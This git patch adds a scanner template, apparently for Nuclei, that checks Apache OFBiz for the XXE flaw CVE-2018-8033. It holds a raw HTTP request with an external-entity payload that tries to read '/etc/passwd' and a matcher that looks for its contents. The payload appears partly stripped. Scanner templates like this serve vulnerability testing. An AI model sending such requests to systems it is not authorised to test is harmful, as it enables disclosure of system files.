From 2c7a7a8b4dcbaca76ba34351f7bec42787a7bb1b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 30 Jan 2021 03:58:20 +0000 Subject: [PATCH] Create CVE-2018-8033.yaml --- cves/2018/CVE-2018-8033.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2018/CVE-2018-8033.yaml diff --git a/cves/2018/CVE-2018-8033.yaml b/cves/2018/CVE-2018-8033.yaml new file mode 100644 index 0000000000..a4e4f0b3a8 --- /dev/null +++ b/cves/2018/CVE-2018-8033.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-8033 + +info: + name: Apache OFBiz XXE + author: pikpikcu + severity: high + description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04 + +requests: + - raw: + - | + POST /webtools/control/xmlrpc HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + Content-Type: application/xml + + ]>&disclose; + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + - type: status + status: + - 200